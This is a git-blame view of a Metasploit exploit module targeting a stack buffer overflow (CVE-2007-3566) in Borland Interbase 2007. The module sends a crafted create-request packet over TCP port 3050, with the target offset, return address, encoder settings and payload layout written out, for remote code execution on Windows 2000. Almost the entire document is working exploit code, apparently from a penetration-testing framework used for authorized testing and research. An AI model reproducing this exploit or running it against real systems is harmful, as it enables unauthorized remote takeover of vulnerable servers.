Files
metasploit-gs/modules/exploits/windows/misc/borland_interbase.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

65 lines
2.0 KiB
Ruby
Raw Normal View History

2007-07-26 01:26:21 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2007-07-26 01:26:21 +00:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = AverageRanking
2007-07-26 01:26:21 +00:00
include Msf::Exploit::Remote::Tcp
2007-07-26 01:26:21 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Borland Interbase Create-Request Buffer Overflow',
'Description' => %q{
2010-05-09 17:45:00 +00:00
This module exploits a stack buffer overflow in Borland Interbase 2007.
By sending a specially crafted create-request packet, a remote
attacker may be able to execute arbitrary code.
2007-07-26 01:26:21 +00:00
},
'Author' => 'MC',
'References' =>
[
2007-07-26 01:26:21 +00:00
[ 'CVE', '2007-3566' ],
[ 'OSVDB', '38602' ],
2009-05-14 19:56:07 +00:00
[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-13' ],
2007-07-26 01:26:21 +00:00
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'AllowWin32SEH' => true
2007-07-26 01:26:21 +00:00
},
'Payload' =>
{
2007-07-29 20:57:13 +00:00
'Space' => 850,
'BadChars' => "\x00",
2007-07-29 20:57:13 +00:00
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
2007-07-26 01:26:21 +00:00
},
'Platform' => 'win',
'Targets' =>
[
2007-07-29 20:57:13 +00:00
[ 'Windows 2000 English All / Borland InterBase 2007', { 'Offset' => 1266, 'Ret' => 0x1002e556 } ], # sanctuarylib.dll
2007-07-26 01:26:21 +00:00
],
'Privileged' => true,
'DefaultTarget' => 0,
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2007-07-24'))
2007-07-26 01:26:21 +00:00
register_options([Opt::RPORT(3050)])
2007-07-26 01:26:21 +00:00
end
def exploit
connect
# Build the exploit buffer.... It's a biggie!
2007-07-29 20:57:13 +00:00
sploit = "\x00\x00\x00\x14" + "\x00\x00\x00\x13" + rand_text_alpha_upper(target['Offset'])
sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2)
2007-07-29 20:57:13 +00:00
sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV') + rand_text_alpha_upper(40000)
2007-07-26 01:26:21 +00:00
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
2009-05-14 19:56:07 +00:00
end